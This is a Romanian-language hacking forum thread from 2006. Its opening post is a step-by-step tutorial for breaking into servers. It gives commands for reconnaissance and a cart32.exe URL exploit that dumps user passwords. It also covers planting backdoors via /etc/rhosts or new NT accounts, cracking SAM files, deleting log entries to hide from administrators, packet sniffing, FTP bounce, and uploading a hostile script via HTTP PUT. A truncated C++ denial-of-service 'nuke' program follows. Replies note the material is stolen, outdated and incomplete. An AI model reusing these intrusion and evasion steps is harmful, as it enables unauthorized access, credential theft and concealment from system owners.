AnON1m Posted May 27, 2006 Report Posted May 27, 2006 Metode clasice de atac asupra oricarui serverStrangerea de informatii este vitala pentru a putea obtine acces pe un server. Voi da in continuare10 metode de adunare a informatiilor despre server.com.1)Pentru a afla IP-ul serverului tot ce trebuie sa faceti este tastati:c:/>windows>tracert -j server.comAcum este necesar sa vedem daca are optiunea "file and print share enabled",si daca sistemul deoperare este linux sau windows nt.c:/>windows>nbtstat -A ipadress unde ipadress este adresa de IP gasita la pasul anterior. Comanda va listanumele tuturor userilor din memoria cache daca serverul este prost configurat.2)Trebuie sa aflam serviciile care ruleaza pe server:ftp,telnet,smtp,finger precum si vesiunea lor.c:/>windows>ftp server.comDaca are serviciu ftp va aparea ceva de genul "connected to server running WUFTPD...".Am aflatversiunea de server ftp care ruleaza pe portul 23. Deschidem browserul de web si introducemhttp://www.server.com/lalalalala.htm. Vom primi un raspuns de genul "file not found on this server.Serverrunning apache.."Am aflat si versiunea serverului pe care sunt stocate paginile web.La fel procedam cu smtp pe portul 25.c:/>windows>telnet qmail.server.com 25 La fel vom primi un mesajasemanator.Cunoscand toate serviciile care ruleaza pe server si versiunea acestora putem foarte usor gasi unexploit pentru ele.3)Scanam toate bugurile cunoscute in cgi-bin,cgi-win si scripts.Cel mai bun program care face acest lucru este Cgifound. Spre exemplu un fraier mi-a trimisdeunazi un link catre un server vulnerabil si anume www.server.com. Vulnerabilitea consta in programulcart32.exe care se gaseste in cgi-bin.exploitul este:www.server.com/cgi-bin/cart32.exe/cart32clientlistParola poate fi orice cuvant si toate parolele userilor sunt listate. Este un bug cunoscut pentrucart32.exe. Pentru a vedea insa versiunea de cart32 introduceti in browser:www.server.com/cgi-bin/cart32.exeFoarte multe informatii despre vulnerabilitatile acestui program gasiti pe:www.packetstorm.securify.com tastand in motorul de cautare 'card32' sau 'card'.Este relativ usor sa afli parola unui server, asta o poate face kiddie script insa este mai greusa nu lasi urme. Si mai greu este sa instalezi un backdoor pe server ca sa poti intra cand doresti.4)Instalarea unui backdoor pe server se face in functie de sistemul de operare.Pentru Unix:Toti userii care au acces la serer sunt pastrati in fisierul etc/rhosts. Dupa ce am patruns inauntrueditam fisierul etc/rhosts in felul urmator: #ed etc/rhosts?somesite.com someuser*w*q Sau mai simpludaca nu cunoasteti Unix este sa descarcati fisierul etc/rhosts si sa adaugati linia:somesite.com semeuserAsta inseamna ca orice utilizator de pe site-ul somesite.com se poate conecta folosindcomanda 'rlogin' si userul 'someuser'. Frumos,nu?Pentru NT:Trebuie adaugat un cont in fisierul *.sam folosind programul 'net'.Mai multe amanunte gasiti pepacketstorm.securify.com tastand 'NT'. Evident acest truc este detectabil de administratorul reteleidar temporar este bun pentru ca va ajuta sa obtineti acces la radacina. Spre exemplu sub NT luatifisierele *.sam si decriptati-le. Sub Unix rulati un script care confera drept de root(SuID shell).Apoi dupa ce am obtinut toate parolele si informatiile dorite trebuie sa indepartam orice urma a'vizitei' noastre pentru ca administratorul sa nu se prinda si sa putem intra oricand. Urmele se stergindepartand IP-ul nostru din fisierele '*.log'. Sub Unix fisierul etc/inetd.conf contine toate serviciilecare ruleaza pe server precum si setarile acestora. Ce s-ar intampla daca modificam temporar acestesetari? 5)O alta metoda cunoscuta de a obtine accesul pe un server este metoda sniffingului.Un sniffer este un program care monitorizeaza traficul pe retea si asculta pe un anume portindicat de utilizator. Cand cineva vrea sa se conecteze la serverul de mail pentru a-si citi mesajeleparola si userul sunt interceptate si trimise la persoana care are snifferul in functiune. Un sniffer foartebun este Buttsniff.Il gasiti pe www.packetstorm.securify.com. Iata cum functioneaza:c:/>buttsniff -l 0 fisier.dmp p fisier.fooSa analizam putin acesta comanda: fisier.dmp este fisierul care va contine datele capturate desniffer. Fisierul fisier.foo contine comenzi sau mai bine zis instructiuni.Continutul aproximativ al unui fisier.foo:-----------------------------*.*.*.*122.1.1.4+25----------------------------Asta inseamna ca este monitorizat serverul 122.1.1.4 pe portul 25 iar celelalte porturi suntexcluse. Un fisier.foo gol inseamna ca vreti sa colectti toate datele care vin/pleaca de la server.Mai multe instructiuni gasiti in fisierul readme.txt.6)O alta metoda de a obtine acces este metoda numita 'ftp bounch attack'Sa explic foarte pe scurt aceasta metoda:Un server ftp A nu permite acces anonim decat unui server ftp B considerat de incredere,probabil din aceeasi retea. Serverul ftp B are un cont 'guest' activat. Se poate patrunde in A prin Bfolosind un script cu comenzi ftp ase-manator celui de mai jos: quo "USER annonymous"quo"PASS E-mail "pasv"...........Mai multe informatii pe astalavista.7)Odata patrunsi intr-un server ftp trebuie sa stim adresa exacta radacinii, de obicei serveruleste instalat pe o ale virtuala. Serverul www.ipswitch.com are aceasta vulnerabilitate:www.ipswitch.com/_vti_pvt/shtml si primim drept raspuns calea exacta si reala a serverului. Acumdevine banal:ftp server.comuser:ftppassword:guestdir ---sa vedem la ce avem acces,poate avem acces la cgi-bin--cd --calea aflata inainte--(c:/inet/root...)put program.exequitO alta vulnerabilitate este comanda PUT. Daca serverul este configurat prost:c:/>windows/telnet server.com 80PUT /scripts/script_ostil.asp HTTP/1.0 --corpul scriptului--/n/n/nDupa aceea il executam din browser:www.server.com/script/script_ostil.asp. Portul poate sanu fie 80 ci 8080 sau 8000 depinde de situatie. Trebuie intai sa vedem unde ruleaza pagini web.9)O alta metoda,de data asta pentru profesionisti este urmarirea datagramelorsau a pachetelor de date care "intra in server". O mare companie a fost atacata in felul acesta cuajutorul comenzii "SYN". Nu am timp sa dau detalii, poate intr-un alt tutorial, cititi articolele de peastalavista, tastati 'tcp'.10) Un program de nuke care intrerupe conexiunea la Internet,care exemplifica conceptulde dos attack. Ideea este ca daemonul care ruleaza pe un anumit port nu poate face fata la cererirepetate. Programul este facut in Borland C++.Compilati-l cu borland c++ ,cu alt compilator nu cred ca merge:nuke.cpp-------------------------------------------#include <conio.h>#include <stdio.h>#include <winsock.h>struct{int port; char *targetIP;int NumOfAttact, BufSize;} parm;void Pause(void){cprintf ("Apasati orice tasta pentru a renunta...");getch();cprintf ("rn");}int CheckWinsock(){WORD wVersionRequested;WSADATA wsaData;int err;wVersionRequested = MAKEWORD(1, 1);err = WSAStartup(wVersionRequested, &wsaData);if (err != 0) return err;if ( LOBYTE( wsaData.wVersion ) != 1 || HIBYTE( wsaData.wVersion ) != 1 ){ WSACleanup(); return -1;} return 0;}void ParseIP(char* des, char *theIP){ unsigned int val; char i;for (i = 0; i < 4; i++){if (*theIP != ' 2
Ady Posted August 18, 2006 Report Posted August 18, 2006 Hmm un pic nedumerit acele comenzi prezentate presupun ca trb executate din run ? , eu cel putin din run nu pot executa niciuna , la voi merge ?
edededi Posted August 18, 2006 Report Posted August 18, 2006 suuuper nici nu sti cat aveam nevoie de acest tut mersi
HexString Posted August 18, 2006 Report Posted August 18, 2006 Beenngaaa.... foarte usor ... ji fara cuvinte grele
G3o Posted October 15, 2006 Report Posted October 15, 2006 ma Anonim dai credit lu nebunu pls(este tutorialul lui) 1
Sad_Dreamer Posted October 15, 2006 Report Posted October 15, 2006 haha ma..Anon!m = Walter......isi multumeste ce penal PS:credits nebunu 1
juice Posted October 16, 2006 Report Posted October 16, 2006 Walter : "Farte bine .. AnON|m . Good Work !"auleoo se lauda singur , si pe deasupra oricum nu e al lui tutorialul si nici nu mai functioneaza cma nici una din metodele insirate. Deja am sarit nene de pe win98 si in XP nu prea mai faci multedooh
xeno13 Posted October 26, 2006 Report Posted October 26, 2006 juice wrote: Walter : "Farte bine .. AnON|m . Good Work !"auleoo se lauda singur , si pe deasupra oricum nu e al lui tutorialul si nici nu mai functioneaza cma nici una din metodele insirate. Deja am sarit nene de pe win98 si in XP nu prea mai faci multedoohasa e ...e vechi topicul si luat de la nebunu...si oricum nu mai merge
Hollogram Posted November 9, 2006 Report Posted November 9, 2006 si in plus... nu e luat nici tot... pentru ca acel cod c++ nu e terminat :@
cain2k Posted November 11, 2006 Report Posted November 11, 2006 ce zice el acolo cu faci aia si da-i click si push aia ... mergea prin 2000 ... Mai simplu folosesti un port scanner si gata ... si daca te intereseaza ce ruleaza pe http ... exista http://www.netcraft.com . Iar faza cu cart32.exe ... OLD ... versiunile vechi aveau o parola implicita ... parca "wemilo" ... si exista si un decrpiter de parola .. dar acu CHIAR daca reusesti sa dl cart32.ini ... este altfel criptat .. si nu am vazut pana acu decripter pentru el ... ca sa aflii parola de admin ... asa ca ... GOD !!! ... OLD !!!
M4T3! Posted February 15, 2011 Report Posted February 15, 2011 Ce prost esti...tu i zici good job dupa 5 ani de cand a facut tutorialul!!!
Guest Kronzy Posted March 17, 2015 Report Posted March 17, 2015 Good Joob LIKE A BOOS !!!!off: La multi ani 2006!on: Nu cred ca era nevoie sa zici "Good Job" la un user care nu mai este activ din 2008 , totusi sunt atatia ani.
Webz Posted March 17, 2015 Report Posted March 17, 2015 2006 , kronzy avea 4 ani atunci , pacat mare pacat . Era sqli peste tot atunci , tu unde erai Kronzy ?